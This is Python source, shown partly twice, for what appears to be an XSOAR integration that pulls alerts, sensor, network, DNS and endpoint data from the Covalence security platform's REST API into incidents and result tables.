covs into one if isinstance(resp.json(), dict): result.append(resp.json()) elif isinstance(resp.json(), list): result = result + resp.json() else: result.append(resp.json()) return result def fetch_incidents(last_run, first_run_time_range): target_orgs = [] if BROKER: orgs = list_org() for org in orgs: target_orgs.append(org['org_name']) else: target_orgs.append(None) next_run = {} incidents = [] for target_org in target_orgs: if target_org: last_fetch = last_run.get(f'{target_org}_last_fetch', None) last_alert_id = last_run.get(f'{target_org}_last_alert_id', None) else: last_fetch = last_run.get('last_fetch', None) last_alert_id = last_run.get('last_alert_id', None) alert_time_max = datetime.utcnow() if last_fetch is None: alert_time_min = alert_time_max - timedelta(days=first_run_time_range) else: alert_time_min = dateparser.parse(last_fetch) # type: ignore assert alert_time_min is not None cov_alerts = list_alerts(target_org=target_org, max_count=FETCH_LIMIT, alert_time_min=alert_time_min.strftime(DATE_FORMAT), alert_time_max=alert_time_max.strftime(DATE_FORMAT), details='true') latest_created_time = alert_time_min for a in cov_alerts: if a['id'] != last_alert_id: created_time = datetime.utcfromtimestamp(a.get('createdTime', 0)) created_time_str = created_time.strftime(DATE_FORMAT) if BROKER: incident_name = f'''[{target_org}] [{a.get('type', 'No alert type')}] {a.get('analystTitle', 'No title')}''' else: incident_name = f'''[{a.get('type', 'No alert type')}] {a.get('analystTitle', 'No title')}''' incident: Dict[str, Any] = { 'name': incident_name, 'occured': created_time_str, 'rawJSON': json.dumps(a) } if a.get('severity', None): # XSOAR mapping # Unknown: 0 # Informational: 0.5 # Low: 1 # Medium: 2 # High: 3 # Critical: 4 severity_from_portal = a['severity'] if severity_from_portal == 'Informational': incident['severity'] = 0.5 elif severity_from_portal == 'Warning': incident['severity'] = 1 elif severity_from_portal == 'Low': incident['severity'] = 1 elif severity_from_portal == 'Medium': incident['severity'] = 2 elif severity_from_portal == 'High': incident['severity'] = 3 elif severity_from_portal == 'Critical': incident['severity'] = 4 else: incident['severity'] = 0 if a.get('analystDescription', None): incident['details'] = a['analystDescription'] incidents.append(incident) if created_time > latest_created_time: latest_created_time = created_time last_alert_id = a['id'] if BROKER: next_run[f'{target_org}_last_fetch'] = latest_created_time.strftime(DATE_FORMAT) next_run[f'{target_org}_last_alert_id'] = last_alert_id else: next_run['last_fetch'] = latest_created_time.strftime(DATE_FORMAT) next_run['last_alert_id'] = last_alert_id return next_run, incidents def list_alerts(target_org=None, max_count=None, initial_index=None, alert_type=None, alert_time_min=None, alert_time_max=None, advanced_filter=None, details=None): if target_org is None: target_org = demisto.args().get('target_org', None) if max_count is None: max_count = demisto.args().get('max_count', 1000) if initial_index is None: initial_index = demisto.args().get('initial_index', None) if alert_type is None: alert_type = demisto.args().get('alert_type', None) if alert_time_min is None: alert_time_min = demisto.args().get('alert_time_min', None) if alert_time_max is None: alert_time_max = demisto.args().get('alert_time_max', None) if advanced_filter is None: advanced_filter = demisto.args().get('advanced_filter', None) params = {} if max_count: params['maxCount'] = max_count if initial_index: params['initialIndex'] = initial_index if alert_type: params['alertType'] = alert_type if alert_time_min: params['alertTimeMin'] = alert_time_min if alert_time_max: params['alertTimeMax'] = alert_time_max if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v1/alerts', target_org=target_org, params=params) if details is None: details = argToBoolean(demisto.args().get('details', 'false')) keys = ['acknowledgedStatus', 'analystDescription', 'analystTitle', 'destIp', 'sourceIp', 'subType', 'title', 'type'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def get_health(): if BROKER: # must do health check on all cov health_check_resp = [] orgs = list_org() for org in orgs: health_check_resp.append( send_request('GET', '/rest/v1/health', target_org=org['org_name']) ) # "logical and" accross all health checks return all(health_check_resp) else: return send_request('GET', '/rest/v1/health') def list_sensors(): target_org = demisto.args().get('target_org', None) r = send_request('GET', '/rest/v1/sensors', target_org=target_org) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['isAuthorized', 'isNetflowGenerator', 'name'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: for s in r: del s['lastActive'] return r def get_sensor(): target_org = demisto.args().get('target_org', None) sensor_id = demisto.args().get('sensor_id') r = send_request('GET', f'/rest/v1/sensors/{sensor_id}', target_org=target_org) for sensor in r: del sensor['lastActive'] return r def connections_summary_by_ip(): target_org = demisto.args().get('target_org', None) max_count = demisto.args().get('max_count', 100) initial_index = demisto.args().get('initial_index', None) source_ip = demisto.args().get('source_ip', None) start_time = demisto.args().get('start_time', None) end_time = demisto.args().get('end_time', None) clients_only = bool(demisto.args().get('clients_only', False)) internal_only = bool(demisto.args().get('internal_only', False)) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if max_count: params['maxCount'] = max_count if initial_index: params['initialIndex'] = initial_index if source_ip: params['sourceIp'] = source_ip if start_time: params['startTime'] = start_time if end_time: params['endTime'] = end_time if clients_only: params['clientsOnly'] = clients_only if internal_only: params['internalOnly'] = internal_only if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v1/connections/ipsummary', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['averageDuration', 'bytesIn', 'bytesOut', 'clientServerRelationship', 'destinationIpAddress', 'dstDomainName', 'serverPorts', 'sourceDomainName', 'sourceIpAddress'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def connections_summary_by_port(): target_org = demisto.args().get('target_org', None) max_count = demisto.args().get('max_count', 100) initial_index = demisto.args().get('initial_index', None) source_ip = demisto.args().get('source_ip', None) start_time = demisto.args().get('start_time', None) end_time = demisto.args().get('end_time', None) clients_only = bool(demisto.args().get('clients_only', False)) internal_only = bool(demisto.args().get('internal_only', False)) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if max_count: params['maxCount'] = max_count if initial_index: params['initialIndex'] = initial_index if source_ip: params['sourceIp'] = source_ip if start_time: params['startTime'] = start_time if end_time: params['endTime'] = end_time if clients_only: params['clientsOnly'] = clients_only if internal_only: params['internalOnly'] = internal_only if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v1/connections/portsummary', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['averageDuration', 'bytesIn', 'bytesOut', 'destinationIpAddress', 'dstDomainName', 'serverPort', 'sourceDomainName', 'sourceIpAddress'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def list_dns_resolutions(): target_org = demisto.args().get('target_org', None) max_count = demisto.args().get('max_count', 100) initial_index = demisto.args().get('initial_index', None) request_time_after = demisto.args().get('request_time_after', None) request_time_before = demisto.args().get('request_time_before', None) domain_name = demisto.args().get('domain_name', None) resolved_ip = demisto.args().get('resolved_ip', None) request_origin_ip = demisto.args().get('request_origin_ip', None) nameserver_ip = demisto.args().get('nameserver_ip', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if max_count: params['maxCount'] = max_count if initial_index: params['initialIndex'] = initial_index if request_time_after: params['requestTimeAfter'] = request_time_after if request_time_before: params['requestTimeBefore'] = request_time_before if domain_name: params['domainName'] = domain_name if resolved_ip: params['resolvedIp'] = resolved_ip if request_origin_ip: params['requestOriginIp'] = request_origin_ip if nameserver_ip: params['nameserverIp'] = nameserver_ip if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v1/dns/resolutions', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['domainName', 'requestOriginIp', 'requestTime', 'resolvedIp'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def list_internal_networks(): target_org = demisto.args().get('target_org', None) return send_request('GET', '/rest/v1/internal_networks', target_org=target_org) def set_internal_networks(): if BROKER: ValueError(f'{demisto.command()} is not available in broker mode') target_org = demisto.args().get('target_org', None) cidr = demisto.args().get('cidr', None) notes = demisto.args().get('notes', None) networks = [] networks.append( { 'cidr': cidr, 'notes': notes } ) send_request('PUT', '/rest/v1/internal_networks', target_org=target_org, json=networks) return cidr, notes def list_endpoint_agents(): target_org = demisto.args().get('target_org', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v2/endpoint/agent/agents', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['hardwareVendor', 'hostName', 'ipAddress', 'isConnected', 'lastSessionUser', 'operatingSystem', 'serialNumber'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def find_endpoint_by_user(): target_org = demisto.args().get('target_org', None) user = demisto.args().get('user', None) params = {} params['advancedFilter'] = f'lastSessionUser={user}' return send_request('GET', '/rest/v2/endpoint/agent/agents', target_org=target_org, params=params) def find_endpoint_by_uuid(): target_org = demisto.args().get('target_org', None) uuid = demisto.args().get('uuid', None) params = {} params['advancedFilter'] = f'agentUuid={uuid}' return send_request('GET', '/rest/v2/endpoint/agent/agents', target_org=target_org, params=params) def search_endpoint_process(): target_org = demisto.args().get('target_org', None) name = demisto.args().get('name', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if name: params['name'] = name if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v2/endpoint/process/search', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['commandLine', 'firstSeenTime', 'lastSeenTime', 'processPath', 'username'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def search_endpoint_installed_software(): target_org = demisto.args().get('target_org', None) name = demisto.args().get('name', None) version = demisto.args().get('version', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if name: params['name'] = name if version: params['version'] = version if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v2/endpoint/software/search', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['installTimestamp', 'name', 'uninstallTimestamp', 'vendor', 'version'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def list_org(): if not BROKER: ValueError(f'{demisto.command()} is only available in broker mode') url = f'https://{HOST}/index' r = requests.get(url, verify=VERIFY_SSL) org_names: List[dict] = [] soup = BeautifulSoup(r.text, 'html.parser') for link in soup.find_all('a'): org_name = link.contents[0] if org_name: if org_name not in [i['org_name'] for i in org_names]: org_names.append({'org_name': org_name}) return org_names def main(): demisto.info(f'{demisto.command()} is called') try: if demisto.command() == 'test-module': if get_health(): return_results('ok') else: return_results('nok') elif demisto.command() == 'fetch-incidents': next_run, incidents = fetch_incidents( last_run=demisto.getLastRun(), first_run_time_range=FIRST_RUN_TIME_RANGE) demisto.setLastRun(next_run) demisto.incidents(incidents) elif demisto.command() == 'cov-secpr-list-alerts': r = list_alerts() if r: readable_output = tableToMarkdown('Alerts', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No alerts found' results = CommandResults( outputs_prefix='Covalence.Alert', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-sensors': r = list_sensors() if r: readable_output = tableToMarkdown('Sensors', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No sensors found' results = CommandResults( outputs_prefix='Covalence.Sensors', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-get-sensor': r = get_sensor() if r: readable_output = tableToMarkdown('Sensor', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'None sensor found' results = CommandResults( outputs_prefix='Covalence.Sensor', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-connections-summary-ip': r = connections_summary_by_ip() if r: readable_output = tableToMarkdown('Connections', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No connections found' results = CommandResults( outputs_prefix='Covalence.Connections', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-connections-summary-port': r = connections_summary_by_port() if r: readable_output = tableToMarkdown('Connections', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No connections found' results = CommandResults( outputs_prefix='Covalence.Connections', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-dns-resolutions': r = list_dns_resolutions() if r: readable_output = tableToMarkdown('DNS Resolutions', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No DNS resolutions found' results = CommandResults( outputs_prefix='Covalence.DNSResolutions', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-internal-networks': r = list_internal_networks() if r: readable_output = tableToMarkdown('Internal Networks', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No internal networks found' results = CommandResults( outputs_prefix='Covalence.InternalNetworks', outputs_key_field='cidr', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-set-internal-networks': r = set_internal_networks() cidr = r[0] notes = r[1] readable_output = f'Internal network set as {cidr} with notes "{notes}"' results = CommandResults( outputs_prefix='Covalence.InternalNetworks', outputs_key_field='cidr', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-endpoint-agents': r = list_endpoint_agents() if r: readable_output = tableToMarkdown('Endpoint Agents', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint agents found' results = CommandResults( outputs_prefix='Covalence.EndpointAgents', outputs_key_field='agentUuid', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-find-endpoint-agents-by-user': r = find_endpoint_by_user() if r: readable_output = tableToMarkdown('Endpoint Agents', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint agents found' results = CommandResults( outputs_prefix='Covalence.EndpointAgents', outputs_key_field='agentUuid', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-find-endpoint-agents-by-uuid': r = find_endpoint_by_uuid() if r: readable_output = tableToMarkdown('Endpoint Agents', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint agents found' results = CommandResults( outputs_prefix='Covalence.EndpointAgents', outputs_key_field='agentUuid', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-search-endpoint-process': r = search_endpoint_process() if r: readable_output = tableToMarkdown('Endpoint Process', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint process found' results = CommandResults( outputs_prefix='Covalence.EndpointProcess', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-search-endpoint-installed-software': r = search_endpoint_installed_software() if r: readable_output = tableToMarkdown('Endpoint Software', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint software found' results = CommandResults( outputs_prefix='Covalence.EndpointSoftware', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-organizations': r = list_org() if r: readable_output = tableToMarkdown('Organizations', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No organizations found' results = CommandResults( outputs_prefix='Covalence.EndpointSoftware', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) else: msg = f'Unknown command {demisto.command()}' demisto.error(msg) except Exception as e: demisto.error(traceback.format_exc()) return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}\n{traceback.format_exc()}') if __name__ in ('__main__', '__builtin__', 'builtins'): main()
import os import requests import json import traceback import dateparser from datetime import datetime, timedelta from bs4 import BeautifulSoup from CommonServerPython import * from typing import List import demistomock as demisto DATE_FORMAT = '%Y-%m-%dT%H:%M:%S' HOST = demisto.params().get('host') BROKER = argToBoolean(demisto.params().get('broker', False)) USERNAME = demisto.params().get('credentials')['identifier'] PASSWORD = demisto.params().get('credentials')['password'] VERIFY_SSL = demisto.params().get('verify_ssl') TIMEOUT = int(demisto.params().get('timeout')) FIRST_RUN_TIME_RANGE = int(demisto.params().get('first_run_time_range').strip()) FETCH_LIMIT = int(demisto.params().get('fetch_limit')) PROXY = demisto.params().get('proxy') if not demisto.params().get('proxy', False): del os.environ['HTTP_PROXY'] del os.environ['HTTPS_PROXY'] del os.environ['http_proxy'] del os.environ['https_proxy'] def find_covs(client_name): url = f'https://{HOST}/index' r = requests.get(url, verify=VERIFY_SSL) covs = [] soup = BeautifulSoup(r.text, 'html.parser') for link in soup.find_all('a'): if client_name == link.contents[0]: href = link.get('href', '') if href: covs.append(href.split('/index/', 1)[-1]) return covs def build_host(host): host = host.rstrip('/') if not host.startswith('https:') and not host.startswith('http:'): host = 'https://' + host if host.startswith('https:') and not host.endswith('/CovalenceWebUI/services'): host += '/CovalenceWebUI/services' elif not host.endswith('/services'): host += '/services' return host def login(host=HOST, cov_id=None, username=USERNAME, password=PASSWORD, verify_ssl=VERIFY_SSL): if not username: raise Exception('Username must be supplied') if not password: raise Exception('Password must be supplied') if not host: raise Exception('Host must be supplied') host = build_host(host) if not verify_ssl: # Disable the warnings if we're not verifying ssl import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) s = requests.Session() if BROKER and cov_id: url = f'https://{HOST}/index/{cov_id}' s.get(url, verify=verify_ssl) p = {'username': username, 'password': password} r = s.post(host + '/rest/login', data=p, verify=verify_ssl) if 200 != r.status_code: raise Exception("Failed to login to %s - %d" % (host, r.status_code)) if not s.cookies: raise Exception("Failed to retrieve cookie") return s def send_request(method, api_endpoint, target_org=None, host=HOST, headers=None, params=None, data=None, json=None): cov_ids = [] BROKER = argToBoolean(demisto.params().get('broker', False)) if BROKER: if target_org: cov_ids = find_covs(target_org) if not cov_ids: raise ValueError(f'Unknown organization {target_org}') else: raise ValueError('Target organization is required in broker mode') else: cov_ids.append(None) result = [] for cov_id in cov_ids: s = login(cov_id=cov_id) host = build_host(host) url = f'{host}{api_endpoint}' req = requests.Request(method, url, headers=headers, params=params, data=data, json=json) prepped = s.prepare_request(req) try: resp = s.send(prepped, stream=None, verify=VERIFY_SSL, proxies=PROXY, cert=None, timeout=TIMEOUT ) resp.raise_for_status() except Exception: return_error('Error in API call [%d] - %s' % (resp.status_code, resp.reason)) else: # when having several covs # merging each response from each covs into one if isinstance(resp.json(), dict): result.append(resp.json()) elif isinstance(resp.json(), list): result = result + resp.json() else: result.append(resp.json()) return result def fetch_incidents(last_run, first_run_time_range): target_orgs = [] if BROKER: orgs = list_org() for org in orgs: target_orgs.append(org['org_name']) else: target_orgs.append(None) next_run = {} incidents = [] for target_org in target_orgs: if target_org: last_fetch = last_run.get(f'{target_org}_last_fetch', None) last_alert_id = last_run.get(f'{target_org}_last_alert_id', None) else: last_fetch = last_run.get('last_fetch', None) last_alert_id = last_run.get('last_alert_id', None) alert_time_max = datetime.utcnow() if last_fetch is None: alert_time_min = alert_time_max - timedelta(days=first_run_time_range) else: alert_time_min = dateparser.parse(last_fetch) # type: ignore assert alert_time_min is not None cov_alerts = list_alerts(target_org=target_org, max_count=FETCH_LIMIT, alert_time_min=alert_time_min.strftime(DATE_FORMAT), alert_time_max=alert_time_max.strftime(DATE_FORMAT), details='true') latest_created_time = alert_time_min for a in cov_alerts: if a['id'] != last_alert_id: created_time = datetime.utcfromtimestamp(a.get('createdTime', 0)) created_time_str = created_time.strftime(DATE_FORMAT) if BROKER: incident_name = f'''[{target_org}] [{a.get('type', 'No alert type')}] {a.get('analystTitle', 'No title')}''' else: incident_name = f'''[{a.get('type', 'No alert type')}] {a.get('analystTitle', 'No title')}''' incident: Dict[str, Any] = { 'name': incident_name, 'occured': created_time_str, 'rawJSON': json.dumps(a) } if a.get('severity', None): # XSOAR mapping # Unknown: 0 # Informational: 0.5 # Low: 1 # Medium: 2 # High: 3 # Critical: 4 severity_from_portal = a['severity'] if severity_from_portal == 'Informational': incident['severity'] = 0.5 elif severity_from_portal == 'Warning': incident['severity'] = 1 elif severity_from_portal == 'Low': incident['severity'] = 1 elif severity_from_portal == 'Medium': incident['severity'] = 2 elif severity_from_portal == 'High': incident['severity'] = 3 elif severity_from_portal == 'Critical': incident['severity'] = 4 else: incident['severity'] = 0 if a.get('analystDescription', None): incident['details'] = a['analystDescription'] incidents.append(incident) if created_time > latest_created_time: latest_created_time = created_time last_alert_id = a['id'] if BROKER: next_run[f'{target_org}_last_fetch'] = latest_created_time.strftime(DATE_FORMAT) next_run[f'{target_org}_last_alert_id'] = last_alert_id else: next_run['last_fetch'] = latest_created_time.strftime(DATE_FORMAT) next_run['last_alert_id'] = last_alert_id return next_run, incidents def list_alerts(target_org=None, max_count=None, initial_index=None, alert_type=None, alert_time_min=None, alert_time_max=None, advanced_filter=None, details=None): if target_org is None: target_org = demisto.args().get('target_org', None) if max_count is None: max_count = demisto.args().get('max_count', 1000) if initial_index is None: initial_index = demisto.args().get('initial_index', None) if alert_type is None: alert_type = demisto.args().get('alert_type', None) if alert_time_min is None: alert_time_min = demisto.args().get('alert_time_min', None) if alert_time_max is None: alert_time_max = demisto.args().get('alert_time_max', None) if advanced_filter is None: advanced_filter = demisto.args().get('advanced_filter', None) params = {} if max_count: params['maxCount'] = max_count if initial_index: params['initialIndex'] = initial_index if alert_type: params['alertType'] = alert_type if alert_time_min: params['alertTimeMin'] = alert_time_min if alert_time_max: params['alertTimeMax'] = alert_time_max if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v1/alerts', target_org=target_org, params=params) if details is None: details = argToBoolean(demisto.args().get('details', 'false')) keys = ['acknowledgedStatus', 'analystDescription', 'analystTitle', 'destIp', 'sourceIp', 'subType', 'title', 'type'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def get_health(): if BROKER: # must do health check on all cov health_check_resp = [] orgs = list_org() for org in orgs: health_check_resp.append( send_request('GET', '/rest/v1/health', target_org=org['org_name']) ) # "logical and" accross all health checks return all(health_check_resp) else: return send_request('GET', '/rest/v1/health') def list_sensors(): target_org = demisto.args().get('target_org', None) r = send_request('GET', '/rest/v1/sensors', target_org=target_org) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['isAuthorized', 'isNetflowGenerator', 'name'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: for s in r: del s['lastActive'] return r def get_sensor(): target_org = demisto.args().get('target_org', None) sensor_id = demisto.args().get('sensor_id') r = send_request('GET', f'/rest/v1/sensors/{sensor_id}', target_org=target_org) for sensor in r: del sensor['lastActive'] return r def connections_summary_by_ip(): target_org = demisto.args().get('target_org', None) max_count = demisto.args().get('max_count', 100) initial_index = demisto.args().get('initial_index', None) source_ip = demisto.args().get('source_ip', None) start_time = demisto.args().get('start_time', None) end_time = demisto.args().get('end_time', None) clients_only = bool(demisto.args().get('clients_only', False)) internal_only = bool(demisto.args().get('internal_only', False)) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if max_count: params['maxCount'] = max_count if initial_index: params['initialIndex'] = initial_index if source_ip: params['sourceIp'] = source_ip if start_time: params['startTime'] = start_time if end_time: params['endTime'] = end_time if clients_only: params['clientsOnly'] = clients_only if internal_only: params['internalOnly'] = internal_only if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v1/connections/ipsummary', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['averageDuration', 'bytesIn', 'bytesOut', 'clientServerRelationship', 'destinationIpAddress', 'dstDomainName', 'serverPorts', 'sourceDomainName', 'sourceIpAddress'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def connections_summary_by_port(): target_org = demisto.args().get('target_org', None) max_count = demisto.args().get('max_count', 100) initial_index = demisto.args().get('initial_index', None) source_ip = demisto.args().get('source_ip', None) start_time = demisto.args().get('start_time', None) end_time = demisto.args().get('end_time', None) clients_only = bool(demisto.args().get('clients_only', False)) internal_only = bool(demisto.args().get('internal_only', False)) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if max_count: params['maxCount'] = max_count if initial_index: params['initialIndex'] = initial_index if source_ip: params['sourceIp'] = source_ip if start_time: params['startTime'] = start_time if end_time: params['endTime'] = end_time if clients_only: params['clientsOnly'] = clients_only if internal_only: params['internalOnly'] = internal_only if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v1/connections/portsummary', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['averageDuration', 'bytesIn', 'bytesOut', 'destinationIpAddress', 'dstDomainName', 'serverPort', 'sourceDomainName', 'sourceIpAddress'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def list_dns_resolutions(): target_org = demisto.args().get('target_org', None) max_count = demisto.args().get('max_count', 100) initial_index = demisto.args().get('initial_index', None) request_time_after = demisto.args().get('request_time_after', None) request_time_before = demisto.args().get('request_time_before', None) domain_name = demisto.args().get('domain_name', None) resolved_ip = demisto.args().get('resolved_ip', None) request_origin_ip = demisto.args().get('request_origin_ip', None) nameserver_ip = demisto.args().get('nameserver_ip', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if max_count: params['maxCount'] = max_count if initial_index: params['initialIndex'] = initial_index if request_time_after: params['requestTimeAfter'] = request_time_after if request_time_before: params['requestTimeBefore'] = request_time_before if domain_name: params['domainName'] = domain_name if resolved_ip: params['resolvedIp'] = resolved_ip if request_origin_ip: params['requestOriginIp'] = request_origin_ip if nameserver_ip: params['nameserverIp'] = nameserver_ip if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v1/dns/resolutions', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['domainName', 'requestOriginIp', 'requestTime', 'resolvedIp'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def list_internal_networks(): target_org = demisto.args().get('target_org', None) return send_request('GET', '/rest/v1/internal_networks', target_org=target_org) def set_internal_networks(): if BROKER: ValueError(f'{demisto.command()} is not available in broker mode') target_org = demisto.args().get('target_org', None) cidr = demisto.args().get('cidr', None) notes = demisto.args().get('notes', None) networks = [] networks.append( { 'cidr': cidr, 'notes': notes } ) send_request('PUT', '/rest/v1/internal_networks', target_org=target_org, json=networks) return cidr, notes def list_endpoint_agents(): target_org = demisto.args().get('target_org', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v2/endpoint/agent/agents', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['hardwareVendor', 'hostName', 'ipAddress', 'isConnected', 'lastSessionUser', 'operatingSystem', 'serialNumber'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def find_endpoint_by_user(): target_org = demisto.args().get('target_org', None) user = demisto.args().get('user', None) params = {} params['advancedFilter'] = f'lastSessionUser={user}' return send_request('GET', '/rest/v2/endpoint/agent/agents', target_org=target_org, params=params) def find_endpoint_by_uuid(): target_org = demisto.args().get('target_org', None) uuid = demisto.args().get('uuid', None) params = {} params['advancedFilter'] = f'agentUuid={uuid}' return send_request('GET', '/rest/v2/endpoint/agent/agents', target_org=target_org, params=params) def search_endpoint_process(): target_org = demisto.args().get('target_org', None) name = demisto.args().get('name', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if name: params['name'] = name if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v2/endpoint/process/search', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['commandLine', 'firstSeenTime', 'lastSeenTime', 'processPath', 'username'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def search_endpoint_installed_software(): target_org = demisto.args().get('target_org', None) name = demisto.args().get('name', None) version = demisto.args().get('version', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if name: params['name'] = name if version: params['version'] = version if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v2/endpoint/software/search', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['installTimestamp', 'name', 'uninstallTimestamp', 'vendor', 'version'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def list_org(): if not BROKER: ValueError(f'{demisto.command()} is only available in broker mode') url = f'https://{HOST}/index' r = requests.get(url, verify=VERIFY_SSL) org_names: List[dict] = [] soup = BeautifulSoup(r.text, 'html.parser') for link in soup.find_all('a'): org_name = link.contents[0] if org_name: if org_name not in [i['org_name'] for i in org_names]: org_names.append({'org_name': org_name}) return org_names def main(): demisto.info(f'{demisto.command()} is called') try: if demisto.command() == 'test-module': if get_health(): return_results('ok') else: return_results('nok') elif demisto.command() == 'fetch-incidents': next_run, incidents = fetch_incidents( last_run=demisto.getLastRun(), first_run_time_range=FIRST_RUN_TIME_RANGE) demisto.setLastRun(next_run) demisto.incidents(incidents) elif demisto.command() == 'cov-secpr-list-alerts': r = list_alerts() if r: readable_output = tableToMarkdown('Alerts', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No alerts found' results = CommandResults( outputs_prefix='Covalence.Alert', outputs_key_field='id', outputs=r, readable_output=readable_output ) 